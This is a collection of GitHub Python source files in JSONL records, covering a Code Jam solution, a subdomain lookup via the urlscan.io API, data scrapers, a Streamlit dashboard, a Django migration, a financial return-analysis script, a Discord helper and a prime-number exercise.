+{"seq_id":"23202052399","text":"import collections\n\ndef solve():\n n = int(input())\n \n colList = [set() for x in range(n)]\n\n trace = 0\n rowProb = 0\n colProb = 0\n for x in range(n):\n row = input().split()\n rowSet = set()\n for y in range(len(row)):\n s = colList[y] \n value = int(row[y])\n \n if x == y:\n trace += value\n \n rowSet.add(value)\n s.add(value)\n\n rowProb = rowProb + 1 if(len(rowSet) < n) else rowProb\n\n for s in colList:\n colProb = colProb + 1 if (len(s) < n) else colProb\n \n\n return trace, rowProb, colProb\n\n\n\nfor case in range(int(input())):\n t, r, c = solve()\n print('Case #%d: %d %d %d' % (case+1, t, r, c))","repo_name":"iChauster/competitive_programming","sub_path":"2020/codejamqual/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29521163679","text":"from common.query import Query\n\n\nclass Urlscan(Query):\n def __init__(self, domain):\n Query.__init__(self)\n self.domain = domain\n self.module = 'Dataset'\n self.source = 'UrlscanQuery'\n\n def query(self):\n \"\"\"\n 向接口查询子域并做子域匹配\n \"\"\"\n self.header = self.get_header()\n self.proxy = self.get_proxy(self.source)\n url = 'https://urlscan.io/api/v1/search/'\n params = {'q': 'domain:' + self.domain}\n resp = self.get(url, params)\n self.subdomains = self.collect_subdomains(resp)\n\n def run(self):\n \"\"\"\n 类执行入口\n \"\"\"\n self.begin()\n self.query()\n self.finish()\n self.save_json()\n self.gen_result()\n self.save_db()\n\n\ndef run(domain):\n \"\"\"\n 类统一调用入口\n\n :param str domain: 域名\n \"\"\"\n query = Urlscan(domain)\n query.run()\n\n\nif __name__ == '__main__':\n run('sangfor.com')\n","repo_name":"shmilylty/OneForAll","sub_path":"modules/datasets/urlscan.py","file_name":"urlscan.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":7171,"dataset":"github-code","pt":"32"}
+{"seq_id":"71295473690","text":"from pymongo import MongoClient\nfrom pprint import pprint\nimport requests\nimport time\nimport os\nimport dotenv\n\n# environment variables and constants\ndotenv.load_dotenv()\nLTA_ACCOUNT_KEY = os.environ.get(\"LTA_ACCOUNT_KEY\")\nMONGODB_URI = os.environ.get(\"MONGODB_URI\")\nAPI_URL = \"http://datamall2.mytransport.sg/ltaodataservice/CarParkAvailabilityv2\"\n\nif __name__ == '__main__':\n # connect to MongoDB\n client = MongoClient(MONGODB_URI)\n db = client.car_park_when_sg\n\n # call the api\n print(\"Calling API...\")\n request_time = int(time.time())\n response = requests.get(API_URL, headers={\"AccountKey\": LTA_ACCOUNT_KEY})\n print(\"API response status code: \", response.status_code)\n\n # only proceed if response is successful\n if response.status_code == 200:\n api_data = response.json()[\"value\"]\n # pprint(api_data[1]) # view one object in the response\n\n print(request_time)\n # wrap the result\n doc_to_insert = {\"timestamp\": request_time, \"data\": api_data}\n\n # save to db and check result\n result = db.api_responses.insert_one(doc_to_insert)\n pprint(result)\n","repo_name":"m-t-chang/car-park-when-sg","sub_path":"scrape_data.py","file_name":"scrape_data.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33569479090","text":"import streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\nimport requests\nimport json\n\nimport time\nfrom PIL import Image\nimport prediction as pred\nimport reports as rep\n\nglobal data\ndef main():\n page = st.sidebar.selectbox(\"Navigate the app\", [\"Information\", \"Reports\", \"Predictions\"])\n if page == \"Information\":\n about()\n elif page == \"Reports\":\n st.write(\"# Lakes Water Quality Monitoring and Properties Data Report ⛵️\")\n rep.micro_view(data)\n rep.macro_view(data)\n elif page == \"Predictions\":\n pred.ml_model()\n st.sidebar.title(\" 🌸 About\")\n st.sidebar.info(\n \"\\nThis app is maintained by [Daniel](\"\n \"https://www.linkedin.com/in/daniel-lew-1a358bc/) & [Kapil] (http://kapil.rbind.io/).\\n\\n\"\n )\n\ndata_path = \"./Data/lake_data_for_viz.csv\"\n\n@st.cache\ndef load_data():\n data = pd.read_csv(data_path)\n return data\ndata = load_data()\n\ndef about():\n\n st.markdown(\"# Lakes Monitoring Dashboard\")\n st.markdown(\"\"\" This app displays a water quality monitoring and property report in the Twin Cities Metro Area alongside a machine learning model that produces predictions on the future median sale value of properties in the area.\n \"\"\")\n st.markdown(\"Every graph in this dashboard is interactive.\")\n image = Image.open('./media/lake.png')\n st.image(image, caption='',use_column_width=True)\n st.markdown(\"**🐳 Data Sources 🐳**\")\n st.markdown(\"This gives a general overview of the data sources \"\n \"used in this project.\")\n st.markdown(\"* Parcel data\")\n st.markdown(\"This dataset is a compilation of tax parcel polygon and point layers assembled into a common coordinate systems from Twin Cities, Minnesota metropolitan area counties.\")\n st.markdown(\"* Lake monitoring data\")\n st.markdown(\"This dataset contains lake quality in each lake and year.\")\n st.markdown(\"* MCES data\")\n st.markdown(\"[ The MCES Citizen-Assisted-Monitoring-Program(CAMP)](https://metrocouncil.org/Wastewater-Water/Services/Water-Quality-Management/Lake-Monitoring-Analysis/Citizen-Assisted-Monitoring-Program.aspx)\")\n #st.markdown(\"The MCES Citizen-Assisted Monitoring Program (CAMP) - \")\n st.markdown(\"The goal of the MCES lake monitoring program is to obtain and provide information that enables cities, counties, lake associations, and watershed management districts to better manage TCMA lakes, thereby protecting and improving lake water quality.\")\n st.markdown(\"**🌏 Project Roadmap 🌏**\")\n image2 = Image.open('./media/roadmap.png')\n st.image(image2, caption='',use_column_width=True)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dqniellew1/Lake-Monitoring-dashboard","sub_path":"Lake_monitoring_dashboard.py","file_name":"Lake_monitoring_dashboard.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1561104436","text":"from math import *\nfrom matrixFunctions import *\nimport numpy as np\n\nmatrix = np.array([[1, 1, 0, 0], [0, 1, 1, 0], [1, 2, 1, 0], [1, 4, -2, 0]])\n\nresult = np.array([2, 3, -1, 4]).transpose()\n\ntest1 = np.array([-3.3, 1.9, 11.5]).transpose()\ntest2 = np.array([6.1, -0.1, 6.5]).transpose()\ntest3 = np.array([4.1, 4.0, 5.5]).transpose()\ntest4 = np.array([3.5, 4.5, 4.5]).transpose()\n\nvector = np.linalg.solve(matrix, result)\n\nprint(vector)\n","repo_name":"SlygoPika/NumericalMethodsScripts","sub_path":"matrices.py","file_name":"matrices.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"42424652434","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Attributes',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=90, verbose_name='\\u0438\\u043c\\u044f')),\n ('value', models.CharField(max_length=90, null=True, verbose_name='\\u0437\\u043d\\u0430\\u0447\\u0435\\u043d\\u0438\\u0435', blank=True)),\n ],\n options={\n 'verbose_name': '\\u0430\\u0442\\u0442\\u0440\\u0438\\u0431\\u0443\\u0442',\n 'verbose_name_plural': '\\u0430\\u0442\\u0442\\u0440\\u0438\\u0431\\u0443\\u0442\\u044b',\n },\n ),\n migrations.CreateModel(\n name='Catalog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=90, verbose_name='\\u043d\\u0430\\u0437\\u0432\\u0430\\u043d\\u0438\\u0435 \\u043a\\u0430\\u0442\\u0430\\u043b\\u043e\\u0433\\u0430')),\n ],\n options={\n 'verbose_name': '\\u043a\\u0430\\u0442\\u0430\\u043b\\u043e\\u0433',\n 'verbose_name_plural': '\\u043a\\u0430\\u0442\\u0430\\u043b\\u043e\\u0433',\n },\n ),\n migrations.CreateModel(\n name='Goods',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=90, verbose_name='\\u043d\\u0430\\u0437\\u0432\\u0430\\u043d\\u0438\\u0435')),\n ('price', models.DecimalField(null=True, verbose_name='\\u0446\\u0435\\u043d\\u0430', max_digits=9, decimal_places=2, blank=True)),\n ],\n options={\n 'verbose_name': '\\u0442\\u043e\\u0432\\u0430\\u0440',\n 'verbose_name_plural': '\\u0442\\u043e\\u0432\\u0430\\u0440\\u044b',\n },\n ),\n migrations.AddField(\n model_name='attributes',\n name='goods',\n field=models.ForeignKey(verbose_name='\\u0442\\u043e\\u0432\\u0430\\u0440', blank=True, to='catalogApp.Goods', null=True),\n ),\n ]\n","repo_name":"mmasterenko/aqua","sub_path":"catalogApp/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2572794701","text":"from typing import Dict\n\nfrom .base import BaseDatabase\nfrom .sqlite_wrapper import SQLiteDatabase\n\n\nclass AutoDatabase:\n \"\"\"\n Automatically select the appropriate database class based on the\n configuration.\n \"\"\"\n\n DATABASE_REGISTRY = {\n 'sqlite': SQLiteDatabase,\n }\n\n @classmethod\n def from_config(cls, db_cfg: Dict) -> 'BaseDatabase':\n \"\"\"\n Determine which database class to use based on the configuration\n and initialize it.\n\n Args:\n db_cfg (Dict): A dictionary containing database configuration\n parameters.\n\n Returns:\n BaseDatabase: An instance of the appropriate database class\n initialized with data from the configuration.\n \"\"\"\n db_type = db_cfg.get('type')\n\n database_class = cls.DATABASE_REGISTRY.get(db_type)\n\n if database_class is None:\n raise ValueError(f\"Unsupported database type '{db_type}'\")\n\n return database_class(db_cfg)\n","repo_name":"xinke-wang/project-tools","sub_path":"pjtools/database/auto_database.py","file_name":"auto_database.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7794004087","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPortfolio Construction:\nObjective: Calculate approximate forward return and scale accepted risk up or down accordingly.\nQuestions: What are expected returns for equity risk?\n What are expected fixed income returns?\n How much can they be expected to deviate?\n \n\n\ninputs: FRED data on spreads and total returns, MOVE Index, yield curve, VIX and returns\noutputs: Location of current spreads in historical range, forward return \n projections, spread change projections, volatility vs. volume/autocorrelation comparison\n -PCA Analysis\nToDo: -Improve length of data\n -Calculate return estimates for spreads and yields\n -Consider other estimates like worst drawdown etc.\n -Organize into subplots into a 1x4\n -How much can you speed up FRED estimator?\n -Where can you maximize sharpe in fixed income?\n -What is forward volatility estimate based on model?\n -Calculate highest sharpe fixed income\n -fix carry for multiple days between dates\n -Calculate implied vol premium/discount\n -Pull in schiller CAPE\n -Rolling vol analysis (rates, stocks, etc)\n -Correlate rates to price vol\n -Simon ward Switching models\n -Simon Ward Portfolio theory model\n -Real Rates / Breakevens\n -Position Sizing\n \nRationale: Shoot for a target Sharpe ratio of 2. Accept net long risk in proportion to estimated\n returns available. As estimated return increases (assets are cheap), increase \n volatility target to allow for 2.0 sharpe. \n \n \n \n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n#import quandl\nimport seaborn as sns\nimport pandas_datareader as pdr\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport yfinance as yf\nimport statsmodels.api as sm\nimport QuantLib as ql\n\n#function definitions\ndef risk_budget(account_value): \n return [vol_target*account_value, vol_target*account_value*np.sqrt(252)]\n\n#function definitions\ndef annual_return_equities():\n return annual_return\n\n\n#initializations\nsns.set()\n\n\n#Get current risk free rate\nrisk_free = pdr.get_data_fred(['USD3MTD156N'], dt.datetime(2020,1,1), dt.date.today())\nr = (risk_free.loc[:,'USD3MTD156N'].values)[-1]\ntarget_sharpe = 2\n\n\n#pull Investment Grade spreads, total return data from FRED \nstart = dt.datetime(1996, 1, 1)\nend = dt.date.today()\nIG_ICE_data = pdr.get_data_fred(['BAMLC0A0CM','BAMLC0A4CBBB','BAMLC8A0C15PY','BAMLC0A0CMEY'], start, end)\n\nfig = plt.figure(figsize=[8,8])\nplt.title(\"ICE BofA IG Spread Histogram, 1996-\")\nsns.distplot(IG_ICE_data.loc[:,'BAMLC0A0CM'], bins=50, label='IG', hist_kws={\"alpha\": .7})\nsns.distplot(IG_ICE_data.loc[:,'BAMLC0A4CBBB'], bins=50, label='BBB', hist_kws={\"alpha\": .1})\nsns.distplot(IG_ICE_data.loc[:,'BAMLC8A0C15PY'], bins=50, label='15Y+', color='purple', hist_kws={\"alpha\": .1})\n\nplt.xlabel('IG (blue), BBB (orange), 15yt+ (purple)')\nIG_ICE_quantile = IG_ICE_data.loc[:,'BAMLC0A0CM'].rank(pct=True)[-1]\nBBB_ICE_quantile = IG_ICE_data.loc[:,'BAMLC0A4CBBB'].rank(pct=True)[-1]\nLong_ICE_quantile = IG_ICE_data.loc[:,'BAMLC8A0C15PY'].rank(pct=True)[-1]\n\nprint(\"ICE/BofA IG spreads of \" + str(100*IG_ICE_data.loc[:,'BAMLC0A0CM'][-1]) + \"bp are higher than \" + '{:.1%}'.format(IG_ICE_quantile) + \" of history (1919-current)\")\nprint(\"ICE/BofA BBB spreads of \" + str(100*IG_ICE_data.loc[:,'BAMLC0A4CBBB'][-1]) + \"bp are higher than \" + '{:.1%}'.format(BBB_ICE_quantile) + \" of history (1919-current)\")\nprint(\"ICE/BofA 15yr+ spreads of \" + str(100*IG_ICE_data.loc[:,'BAMLC8A0C15PY'][-1]) + \"bp 
are higher than \" + '{:.1%}'.format(Long_ICE_quantile) + \" of history (1919-current)\")\n\n#print(\"1yr. forward yield change from this level is typically: \")\n\nstart = dt.datetime(1919, 1, 1)\nend = dt.date.today() \nIG_moodys_data = pdr.get_data_fred(['BAA','AAA'], start, end)\nIG_moodys_daily = pdr.get_data_fred(['DBAA','DAAA'], end + dt.timedelta(days=-7), end)\nIG_moodys_data.loc[IG_moodys_daily.index[-1],'BAA'] = IG_moodys_daily.loc[:,'DBAA'][-1]\nIG_moodys_data.loc[IG_moodys_daily.index[-1],'AAA'] = IG_moodys_daily.loc[:,'DAAA'][-1]\n\nfig = plt.figure(figsize=[8,8])\nplt.title(\"Moody's Baa/Aaa Yield Histogram, 1919-\")\nsns.distplot(IG_moodys_data.loc[:,'BAA'], bins=50, label='Baa')\nsns.distplot(IG_moodys_data.loc[:,'AAA'], bins=50, label='Aaa')\nplt.xlabel('Baa (blue), Aaa (orange)')\nBaa_quantile = IG_moodys_data.loc[:,'BAA'].rank(pct=True)[-1]\nAaa_quantile = IG_moodys_data.loc[:,'AAA'].rank(pct=True)[-1]\n\nprint(\"Moody's Baa yields of \" + '{:.1%}'.format(.01*IG_moodys_data.loc[:,'BAA'][-1]) + \" are higher than \" + '{:.1%}'.format(Baa_quantile) + \" of history (1919-current)\")\nprint(\"Moody's Aaa yields of \" + '{:.1%}'.format(.01*IG_moodys_data.loc[:,'AAA'][-1]) + \" are higher than \" + '{:.1%}'.format(Aaa_quantile) + \" of history (1919-current)\")\n#print(\"1yr. forward yield change from this level is typically: \")\n\n\n#Begin Equity Analysis\nFRED_equity_data = pdr.get_data_fred(['NCBEILQ027S','BCNSDODNS','CMDEBT','FGSDODNS','SLGSDODNS','FBCELLQ027S','DODFFSWCMI'], start, end)\nequity_allocation = ((FRED_equity_data.loc[:,'NCBEILQ027S']+FRED_equity_data.loc[:,'FBCELLQ027S'])/1000)/(((FRED_equity_data.loc[:,'NCBEILQ027S']+FRED_equity_data.loc[:,'FBCELLQ027S'])/1000)+FRED_equity_data.loc[:,'BCNSDODNS']+FRED_equity_data.loc[:,'CMDEBT']+FRED_equity_data.loc[:,'FGSDODNS']+FRED_equity_data.loc[:,'SLGSDODNS']+FRED_equity_data.loc[:,'DODFFSWCMI'])\nFRED_end_date = FRED_equity_data.index[-1] + dt.timedelta(days=90)\n\ntickerData = {}\ntickerDF = {}\nprediction_data = {}\nmodel_outputs = {}\nmodel_stats = {}\n\ntest_assets = ['^SP500TR','^GSPC','^IXIC'] #,'^XNDX','D1AR.DE']\nfor ticker in test_assets:\n tickerData[ticker] = yf.Ticker(ticker)\n #get the historical prices for this ticker\n tickerDF[ticker] = tickerData[ticker].history(period='1w', start='1971-1-1', end='2020-12-31')\n prediction_data[ticker] = pd.merge_asof(left=pd.DataFrame(equity_allocation, columns=['equity_allocation']), right=tickerDF[ticker], left_index=True, right_index=True).dropna()\n prediction_data[ticker].loc[:,'logDiff'] = np.log(prediction_data[ticker].loc[:,'Close']).diff()\n prediction_data[ticker].loc[:,'fwd1'] = prediction_data[ticker].loc[:,'logDiff'].rolling(4).sum().shift(-4)\n prediction_data[ticker].loc[:,'fwd3'] = prediction_data[ticker].loc[:,'logDiff'].rolling(12).sum().shift(-12)\n prediction_data[ticker].loc[:,'fwd5'] = prediction_data[ticker].loc[:,'logDiff'].rolling(20).sum().shift(-20)\n prediction_data[ticker].loc[:,'fwd10'] = prediction_data[ticker].loc[:,'logDiff'].rolling(40).sum().shift(-40)\n \n \n model_outputs[ticker] = {}\n model_stats[ticker] = {}\n\n #current_allocation = equity_allocation[-1]\n print('Implying current allocation from S&P 500 Total Returns')\n post_report = tickerDF['^SP500TR'].loc[tickerDF['^SP500TR'].index>FRED_end_date,'Close']\n post_report_return = post_report[-1]/post_report[0]\n last_report = FRED_equity_data.iloc[-1] \n current_allocation = 
((last_report['NCBEILQ027S']*post_report_return+last_report['FBCELLQ027S']*post_report_return)/1000)/(((last_report['NCBEILQ027S']*post_report_return+last_report['FBCELLQ027S']*post_report_return)/1000)+last_report['BCNSDODNS']+last_report['CMDEBT']+last_report['FGSDODNS']+last_report['SLGSDODNS']+last_report['DODFFSWCMI'])\n\n \n allocation_quantile = prediction_data[ticker].loc[:,'equity_allocation'].append(pd.Series(current_allocation)).rank(pct=True).iloc[-1] \n print('\\n*Equity allocation is higher than ' + '{:.1%}'.format(allocation_quantile) + ' of available data points for ' + ticker + '.')\n \n\n print('\\nEquity Allocation vs. Forward Returns:')\n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd1']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd1']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 1yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_1yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('1yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n\n \n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd3']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd3']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 3yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_3yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('3yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n \n \n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd5']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd5']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 5yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_5yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('5yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n \n \n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd10']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd10']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 10yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_10yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('10yr. Forward Return [' + ticker + '] vs. 
Equity Allocation') \n    \n    \ntenYr_return = model_stats['^SP500TR']['equityAlloc_10yrFwd'].predict([1, current_allocation])[0]\nannual_return = np.log(1+tenYr_return)/10\nexcess_return_prediction = annual_return - r/100\nvol_target = excess_return_prediction / target_sharpe\n    \nprint('\\n10yr forward return of S&P 500 annualizes to ' + '{:.1%}'.format(annual_return))\nprint('Risk free rate is ' + '{:.2%}'.format(r/100))\nprint('Excess return prediction is ' + '{:.2%}'.format(excess_return_prediction))\nprint('Annual vol target for ' + str(target_sharpe) + ' sharpe is: ' + '{:.2%}'.format(vol_target))\n\n\n#Begin Interest Rate Analysis\nbond_yields = pdr.get_data_fred(['DGS2','DGS3','DGS5','DGS7','DGS10','DGS20','DGS30'], dt.datetime(1962,1,1), dt.datetime(2020,2,1))\nmaturities = [(2,'DGS2'),(3,'DGS3'),(5,'DGS5'),(7,'DGS7'),(10,'DGS10'),(20,'DGS20'),(30,'DGS30')]\n\nduration = pd.DataFrame()\n# 1/bond_yields.loc[:,'DGS2'] * (1-1/(1+.5*bond_yields.loc[:,'DGS2'])**2*2)\n#bond_yields = bond_yields.dropna()\n#need to drop non-sequential days\n\ndayCount = ql.Thirty360()\ncalendar = ql.UnitedStates()\ninterpolation = ql.Linear()\ncompounding = ql.Compounded\ncompoundingFrequency = ql.Annual\n\nreturn_analysis = {}\nfor curve_point in maturities:\n    test_yields = bond_yields.loc[:,curve_point[1]].dropna()\n    # keep only observations followed by another one within a week so one-day returns stay comparable\n    valid_indices = np.where((np.diff((test_yields.index).values).astype('timedelta64[D]').astype(int))<7)[0]\n    valid_dates = test_yields.iloc[valid_indices]\n    \n    return_analysis[curve_point] = pd.DataFrame()\n    for idx, eval_date in enumerate(valid_dates.index):\n        start = ql.Date(eval_date.day, eval_date.month, eval_date.year)\n        maturity = start+365*curve_point[0]\n        schedule = ql.MakeSchedule(start, maturity, ql.Period('6M'))\n        interest = ql.FixedRateLeg(schedule, ql.Actual365Fixed(), [100.], [test_yields.loc[eval_date]/100])\n        bond = ql.Bond(0, ql.UnitedStates(), start, interest)\n        rate = ql.InterestRate(test_yields.loc[eval_date]/100, ql.Actual365Fixed(), ql.Simple, ql.Annual)\n        open_price = ql.BondFunctions.cleanPrice(bond,rate,start)\n        next_location = valid_indices[idx]+1\n        rate_close = ql.InterestRate(test_yields.iloc[next_location]/100, ql.Actual365Fixed(), ql.Simple, ql.Annual)\n        close_price = ql.BondFunctions.cleanPrice(bond,rate_close,start+1)\n        price_return = close_price-open_price\n        carry = (test_yields.loc[eval_date] / 365)\n        total_return = price_return + carry\n        return_analysis[curve_point].loc[eval_date,'open_yield'] = test_yields.loc[eval_date]/100\n        return_analysis[curve_point].loc[eval_date,'close_yield'] = test_yields.iloc[next_location]/100\n        return_analysis[curve_point].loc[eval_date,'open_price'] = open_price\n        return_analysis[curve_point].loc[eval_date,'close_price'] = close_price\n        return_analysis[curve_point].loc[eval_date,'price_return'] = price_return\n        return_analysis[curve_point].loc[eval_date,'carry'] = carry\n        return_analysis[curve_point].loc[eval_date,'total_return'] = total_return\n        return_analysis[curve_point].loc[eval_date,'abs_move'] = abs(total_return)\n    \n\n#graph analyses - 2y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(2,'DGS2')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(2,'DGS2')], x='open_yield', y='total_return', 
fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(2,'DGS2')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 5y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(5,'DGS5')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(5,'DGS5')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(5,'DGS5')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 7y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(7,'DGS7')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(7,'DGS7')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(7,'DGS7')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 10y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(10,'DGS10')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(10,'DGS10')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(10,'DGS10')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 20y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(20,'DGS20')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(20,'DGS20')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(20,'DGS20')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 30y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(30,'DGS30')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(30,'DGS30')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(30,'DGS30')], x='open_yield', y='abs_move', fit_reg=True)\n\n\n#calculate return & vol stats [not entirely comparable]\nreturn_2y = (1+return_analysis[(2,'DGS2')].loc[:,'total_return']/100).product()-1\nreturn_5y = (1+return_analysis[(5,'DGS5')].loc[:,'total_return']/100).product()-1\ndaily_vol_2y = (return_analysis[(2,'DGS2')].loc[:,'total_return']/100).std()\ndaily_vol_5y = (return_analysis[(5,'DGS5')].loc[:,'total_return']/100).std()\ndaily_vol_10y = (return_analysis[(10,'DGS10')].loc[:,'total_return']/100).std()\nmean_return_2y = (return_analysis[(2,'DGS2')].loc[:,'total_return']/100).mean()\n\ndaily_vol_2y*np.sqrt(252)\ndaily_vol_5y*np.sqrt(252)\ndaily_vol_10y*np.sqrt(252)\n\n\n# #diagnostics\n# ql.BondFunctions.startDate(bond)\n# ql.BondFunctions.maturityDate(bond)\n# test_yields[eval_date]/100\n# ql.BondFunctions.nextCashFlowDate(bond, start)\n# ql.BondFunctions.nextCashFlowAmount(bond, start)\n\n","repo_name":"jmfreeland/volAnalysis","sub_path":"portfolioDesign.py","file_name":"portfolioDesign.py","file_ext":"py","file_size_in_byte":16882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"28867415487","text":"import discord\n\nfrom redbot.core import Config\nfrom redbot.core.bot import Red\n\n__all__ = (\"get_starboard\", \"get_starboard_cache\", \"StarboardBase\")\n\n_guild_cache = {}\nbot: Red = None\nconfig: Config = None\n\n\ndef get_starboard(guild: discord.Guild):\n from starboard.guild import StarboardGuild\n\n if guild.id not in _guild_cache:\n sb = StarboardGuild(guild)\n _guild_cache[guild.id] = sb\n return _guild_cache[guild.id]\n\n\ndef get_starboard_cache():\n return _guild_cache\n\n\nclass StarboardBase:\n\n @property\n def config(self):\n return config\n\n @config.setter\n def config(self, cfg: Config):\n global config\n config = cfg\n\n @property\n def bot(self):\n return bot\n\n @bot.setter\n def bot(self, red: Red):\n global bot\n bot = red\n","repo_name":"celestialfault/Swift-Cogs","sub_path":"starboard/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"12081845079","text":"\ndef nguyento(n):\n for i in range(2, n):\n if n % i == 0:\n print(\"Khong phai so nguyen toc\",n)\n break\n else:\n print(\"so nguyen to la \",n)\n\n\n\n\nn_list = 1 , 2 ,4 ,8, 5\n\nresult_string =\"\"\nfor num in n_list:\n num = int(num)\n nguyento_num = nguyento(num)\n result_string += str(nguyento_num) + \"\\n\"\n\nprint(result_string)\n","repo_name":"aerovfx/Fullstack4kid","sub_path":"CREATE_APP/Python/PythonChallenge/Level1/b13_kiemtrasonguyentov1.py","file_name":"b13_kiemtrasonguyentov1.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
